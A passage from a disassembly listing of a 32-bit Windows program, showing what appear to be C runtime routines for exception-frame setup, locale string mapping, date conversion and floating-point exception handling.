push dword ptr [esi+18h]
push edi
call sub_4236CB
jmp short loc_429993
; ---------------------------------------------------------------------------
loc_429974: ; CODE XREF: sub_4297EE+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_429A19
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_4236C4
jmp short loc_429993
; ---------------------------------------------------------------------------
loc_42998E: ; CODE XREF: sub_4297EE+6A�j
; sub_4297EE+7C�j ...
call sub_429AED
loc_429993: ; CODE XREF: sub_4297EE+98�j
; sub_4297EE+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_429997: ; CODE XREF: sub_4297EE+2E�j
; sub_4297EE+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4297EE endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_429A8C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4299B2 proc near ; CODE XREF: sub_4292C0+17C�p
; sub_429776+46�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F5E0
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_4299F9
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_4299F9
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_4236C4
or [ebp+var_4], 0FFFFFFFFh
loc_4299F9: ; CODE XREF: sub_4299B2+2A�j
; sub_4299B2+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4299B2 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_429A8C
; =============== S U B R O U T I N E =======================================
sub_429A19 proc near ; CODE XREF: sub_4297EE+8F�p
; sub_4297EE+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_429A3A
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_429A3A: ; CODE XREF: sub_429A19+12�j
pop esi
retn
sub_429A19 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A40 proc near ; CODE XREF: sub_423757+40�p
; sub_42957A+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_423A45
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_429A7F
mov ecx, 2
loc_429A7F: ; CODE XREF: sub_429A40+38�j
push ecx
call sub_423A45
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_429A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A8C proc near ; CODE XREF: sub_4292C0:loc_42946E�j
; sub_429618:loc_429629�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042CFB6 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F5F0
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
mov [ebp+var_4], esi
call sub_42599D
cmp [eax+60h], esi
jz short loc_429ADF
mov [ebp+var_4], 1
call sub_42599D
call dword ptr [eax+60h]
mov [ebp+var_4], esi
jmp short loc_429ADF
; ---------------------------------------------------------------------------
loc_429AD4: ; DATA XREF: .text:0042F600�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_429AD8: ; DATA XREF: .text:0042F604�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_429ADF: ; CODE XREF: sub_429A8C+32�j
; sub_429A8C+46�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_429AE8: ; DATA XREF: .text:0042F5F8�o
jmp loc_42CFB6
sub_429A8C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AED proc near ; CODE XREF: sub_4238FB+23�p
; sub_4238FB:loc_423966�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F608
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_44BB90
test eax, eax
jz short loc_429B35
mov [ebp+var_4], 1
call eax ; sub_429A8C
jmp short loc_429B31
; ---------------------------------------------------------------------------
loc_429B2A: ; DATA XREF: .text:0042F618�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_429B2E: ; DATA XREF: .text:0042F61C�o
mov esp, [ebp+var_18]
loc_429B31: ; CODE XREF: sub_429AED+3B�j
and [ebp+var_4], 0
loc_429B35: ; CODE XREF: sub_429AED+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_429B3E: ; DATA XREF: .text:0042F610�o
jmp sub_429A8C
sub_429AED endp
; =============== S U B R O U T I N E =======================================
sub_429B43 proc near ; DATA XREF: sub_429B89�o
; .text:004493F0�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_429B66
cmp dword ptr [eax+10h], 3
jnz short loc_429B66
cmp dword ptr [eax+14h], 19930520h
jnz short loc_429B66
jmp sub_429A8C
; ---------------------------------------------------------------------------
loc_429B66: ; CODE XREF: sub_429B43+D�j
; sub_429B43+13�j ...
mov eax, dword_6314AC
test eax, eax
jz short loc_429B83
push eax
call sub_42CF9E
test eax, eax
pop ecx
jz short loc_429B83
push esi
call dword_6314AC
jmp short loc_429B85
; ---------------------------------------------------------------------------
loc_429B83: ; CODE XREF: sub_429B43+2A�j
; sub_429B43+35�j
xor eax, eax
loc_429B85: ; CODE XREF: sub_429B43+3E�j
pop esi
retn 4
sub_429B43 endp
; =============== S U B R O U T I N E =======================================
sub_429B89 proc near ; DATA XREF: .text:0043202C�o
push offset sub_429B43
call dword_42F1A8 ; SetUnhandledExceptionFilter
mov dword_6314AC, eax
retn
sub_429B89 endp
; =============== S U B R O U T I N E =======================================
sub_429B9A proc near ; DATA XREF: .text:00432044�o
push dword_6314AC
call dword_42F1A8 ; SetUnhandledExceptionFilter
retn
sub_429B9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429BA7 proc near ; CODE XREF: sub_4240A0+C5�p
; sub_4240A0+F3�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F628
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_6314B0, edi
jnz short loc_429C1D
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_42F620
mov esi, 100h
push esi
push edi
call dword_42F1A0 ; LCMapStringW
test eax, eax
jz short loc_429BFB
mov dword_6314B0, ebx
jmp short loc_429C1D
; ---------------------------------------------------------------------------
loc_429BFB: ; CODE XREF: sub_429BA7+4A�j
push edi
push edi
push ebx
push offset word_44D6A0
push esi
push edi
call dword_42F1A4 ; LCMapStringA
test eax, eax
jz loc_429D35
mov dword_6314B0, 2
loc_429C1D: ; CODE XREF: sub_429BA7+2E�j
; sub_429BA7+52�j
cmp [ebp+arg_C], edi
jle short loc_429C32
push [ebp+arg_C]
push [ebp+arg_8]
call sub_42E53D
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_429C32: ; CODE XREF: sub_429BA7+79�j
mov eax, dword_6314B0
cmp eax, 2
jnz short loc_429C59
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F1A4 ; LCMapStringA
jmp loc_429D37
; ---------------------------------------------------------------------------
loc_429C59: ; CODE XREF: sub_429BA7+93�j
cmp eax, 1
jnz loc_429D35
cmp [ebp+arg_18], edi
jnz short loc_429C6F
mov eax, dword_6314D8
mov [ebp+arg_18], eax
loc_429C6F: ; CODE XREF: sub_429BA7+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_42F098 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_429D35
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4220C0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_429CCA
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_429CCA: ; CODE XREF: sub_429BA7+10E�j
cmp [ebp+var_24], edi
jz short loc_429D35
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_42F098 ; MultiByteToWideChar
test eax, eax
jz short loc_429D35
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F1A0 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_429D35
test byte ptr [ebp+arg_4+1], 4
jz short loc_429D49
cmp [ebp+arg_14], edi
jz loc_429DC4
cmp esi, [ebp+arg_14]
jg short loc_429D35
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F1A0 ; LCMapStringW
test eax, eax
jnz loc_429DC4
loc_429D35: ; CODE XREF: sub_429BA7+66�j
; sub_429BA7+B5�j ...
xor eax, eax
loc_429D37: ; CODE XREF: sub_429BA7+AD�j
; sub_429BA7+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_429D49: ; CODE XREF: sub_429BA7+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4220C0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_429D7D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_429D7D: ; CODE XREF: sub_429BA7+1C2�j
cmp ebx, edi
jz short loc_429D35
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F1A0 ; LCMapStringW
test eax, eax
jz short loc_429D35
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_429DA4
push edi
push edi
jmp short loc_429DAA
; ---------------------------------------------------------------------------
loc_429DA4: ; CODE XREF: sub_429BA7+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_429DAA: ; CODE XREF: sub_429BA7+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_42F0A4 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_429D35
loc_429DC4: ; CODE XREF: sub_429BA7+165�j
; sub_429BA7+188�j
mov eax, esi
jmp loc_429D37
sub_429BA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DCB proc near ; CODE XREF: sub_4241D4+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_429E87
cmp ebx, 8Ah
jg loc_429E87
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_44C0F4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_429E0A
cmp edi, 2
jle short loc_429E0A
inc esi
loc_429E0A: ; CODE XREF: sub_429DCB+37�j
; sub_429DCB+3C�j
call sub_42D04A
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_44C010
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_429E7D
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_429E83
cmp dword_44C014, 0
jz short loc_429E83
lea eax, [ebp+var_24]
push eax
call sub_42D2FF
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_429E83
loc_429E7D: ; CODE XREF: sub_429DCB+90�j
add ecx, dword_44C018
loc_429E83: ; CODE XREF: sub_429DCB+96�j
; sub_429DCB+9F�j ...
mov eax, ecx
jmp short loc_429E8A
; ---------------------------------------------------------------------------
loc_429E87: ; CODE XREF: sub_429DCB+13�j
; sub_429DCB+1F�j
or eax, 0FFFFFFFFh
loc_429E8A: ; CODE XREF: sub_429DCB+BA�j
pop ebx
leave
retn
sub_429DCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_429E8D(int, double, int)
sub_429E8D proc near ; CODE XREF: sub_4242B0+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_44C12C, 0
jnz short loc_429EC2
push [ebp+arg_C] ; int
fld [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_42A443
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_429EC2: ; CODE XREF: sub_429E8D+A�j
call sub_426528
push 0FFFFh
mov dword ptr [eax], 21h
push [ebp+arg_C]
call sub_42A6B8
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_429E8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_429EE1(int, int, double, double, int)
sub_429EE1 proc near ; CODE XREF: sub_4242B0:loc_424373�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_42A22C
add esp, 0Ch
test eax, eax
jnz short loc_429F1F
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_429F79
add esp, 18h
loc_429F1F: ; CODE XREF: sub_429EE1+1A�j
push [ebp+arg_0]
call sub_42A518
cmp dword_44C12C, 0
pop ecx
jnz short loc_429F5D
test eax, eax
jz short loc_429F5D
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_42A443
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_429F5D: ; CODE XREF: sub_429EE1+4E�j
; sub_429EE1+52�j
push eax
call sub_42A4CB
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_42A6B8
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_429EE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429F79 proc near ; CODE XREF: sub_429EE1+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_429FAB
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_429FAB: ; CODE XREF: sub_429F79+23�j
test cl, 2
jz short loc_429FBE
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_429FBE: ; CODE XREF: sub_429F79+35�j
test cl, bl
jz short loc_429FD0
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_429FD0: ; CODE XREF: sub_429F79+47�j
test cl, 4
jz short loc_429FE3
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_429FE3: ; CODE XREF: sub_429F79+5A�j
test cl, 8
jz short loc_429FF6
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_429FF6: ; CODE XREF: sub_429F79+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_42A69B
test al, bl
jz short loc_42A07F
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_42A07F: ; CODE XREF: sub_429F79+FD�j
test al, 4
jz short loc_42A08A
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_42A08A: ; CODE XREF: sub_429F79+108�j
test al, 8
jz short loc_42A095
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_42A095: ; CODE XREF: sub_429F79+113�j
test al, 10h
jz short loc_42A09F
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_42A09F: ; CODE XREF: sub_429F79+11E�j
test al, 20h
jz short loc_42A0A9
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_42A0A9: ; CODE XREF: sub_429F79+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_42A0E8
cmp eax, 400h
jz short loc_42A0DA
cmp eax, 800h
jz short loc_42A0CE
cmp eax, ecx
jnz short loc_42A0EE
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_42A0EE
; ---------------------------------------------------------------------------
loc_42A0CE: ; CODE XREF: sub_429F79+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_42A0E4
; ---------------------------------------------------------------------------
loc_42A0DA: ; CODE XREF: sub_429F79+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_42A0E4: ; CODE XREF: sub_429F79+15F�j
mov [eax], ecx
jmp short loc_42A0EE
; ---------------------------------------------------------------------------
loc_42A0E8: ; CODE XREF: sub_429F79+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_42A0EE: ; CODE XREF: sub_429F79+14B�j
; sub_429F79+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_42A119
cmp eax, 200h
jz short loc_42A10C
cmp eax, ecx
jnz short loc_42A126
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_42A126
; ---------------------------------------------------------------------------
loc_42A10C: ; CODE XREF: sub_429F79+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_42A124
; ---------------------------------------------------------------------------
loc_42A119: ; CODE XREF: sub_429F79+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_42A124: ; CODE XREF: sub_429F79+19E�j
mov [eax], ecx
loc_42A126: ; CODE XREF: sub_429F79+189�j
; sub_429F79+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_42A6A9
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_42F1F8 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_42A1A0
and dword ptr [esi], 0FFFFFFFEh
loc_42A1A0: ; CODE XREF: sub_429F79+222�j
test byte ptr [eax+8], 8
jz short loc_42A1A9
and dword ptr [esi], 0FFFFFFFBh
loc_42A1A9: ; CODE XREF: sub_429F79+22B�j
test byte ptr [eax+8], 4
jz short loc_42A1B2
and dword ptr [esi], 0FFFFFFF7h
loc_42A1B2: ; CODE XREF: sub_429F79+234�j
test byte ptr [eax+8], 2
jz short loc_42A1BB
and dword ptr [esi], 0FFFFFFEFh
loc_42A1BB: ; CODE XREF: sub_429F79+23D�j
test [eax+8], bl
jz short loc_42A1C3
and dword ptr [esi], 0FFFFFFDFh
loc_42A1C3: ; CODE XREF: sub_429F79+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_42A1F7
dec ecx
jz short loc_42A1EB
dec ecx
jz short loc_42A1E1
dec ecx
jnz short loc_42A1F9
or byte ptr [esi+1], 0Ch
jmp short loc_42A1F9
; ---------------------------------------------------------------------------
loc_42A1E1: ; CODE XREF: sub_429F79+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_42A1F3
; ---------------------------------------------------------------------------
loc_42A1EB: ; CODE XREF: sub_429F79+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_42A1F3: ; CODE XREF: sub_429F79+270�j
mov [esi], ecx
jmp short loc_42A1F9
; ---------------------------------------------------------------------------
loc_42A1F7: ; CODE XREF: sub_429F79+257�j
and [esi], edx
loc_42A1F9: ; CODE XREF: sub_429F79+260�j
; sub_429F79+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_42A219
dec ecx
jz short loc_42A210
dec ecx
jnz short loc_42A222
and [esi], edx
jmp short loc_42A222
; ---------------------------------------------------------------------------
loc_42A210: ; CODE XREF: sub_429F79+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_42A220
; ---------------------------------------------------------------------------
loc_42A219: ; CODE XREF: sub_429F79+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_42A220: ; CODE XREF: sub_429F79+29E�j
mov [esi], ecx
loc_42A222: ; CODE XREF: sub_429F79+291�j
; sub_429F79+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_429F79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A22C proc near ; CODE XREF: sub_429EE1+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_42A257
test byte ptr [ebp+arg_8], bl
jz short loc_42A257
push ebx
call sub_42A6DB
pop ecx
and edi, 0FFFFFFF7h
jmp loc_42A421
; ---------------------------------------------------------------------------
loc_42A257: ; CODE XREF: sub_42A22C+15�j
; sub_42A22C+1A�j
test al, 4
jz short loc_42A271
test byte ptr [ebp+arg_8], 4
jz short loc_42A271
push 4
call sub_42A6DB
pop ecx
and edi, 0FFFFFFFBh
jmp loc_42A421
; ---------------------------------------------------------------------------
loc_42A271: ; CODE XREF: sub_42A22C+2D�j
; sub_42A22C+33�j
test al, bl
jz loc_42A34B
test byte ptr [ebp+arg_8], 8
jz loc_42A34B
push 8
call sub_42A6DB
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_42A323
cmp ecx, 400h
jz short loc_42A2FB
cmp ecx, 800h
jz short loc_42A2D3
cmp ecx, eax
jnz loc_42A343
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_42F570
fld dbl_44BD88
fnstsw ax
sahf
ja short loc_42A2CB
fchs
loc_42A2CB: ; CODE XREF: sub_42A22C+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42A341
; ---------------------------------------------------------------------------
loc_42A2D3: ; CODE XREF: sub_42A22C+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_42F570
fnstsw ax
sahf
jbe short loc_42A2EB
fld dbl_44BD78
jmp short loc_42A2F3
; ---------------------------------------------------------------------------
loc_42A2EB: ; CODE XREF: sub_42A22C+B5�j
fld dbl_44BD88
fchs
loc_42A2F3: ; CODE XREF: sub_42A22C+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42A341
; ---------------------------------------------------------------------------
loc_42A2FB: ; CODE XREF: sub_42A22C+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_42F570
fnstsw ax
sahf
jbe short loc_42A313
fld dbl_44BD88
jmp short loc_42A31B
; ---------------------------------------------------------------------------
loc_42A313: ; CODE XREF: sub_42A22C+DD�j
fld dbl_44BD78
fchs
loc_42A31B: ; CODE XREF: sub_42A22C+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42A341
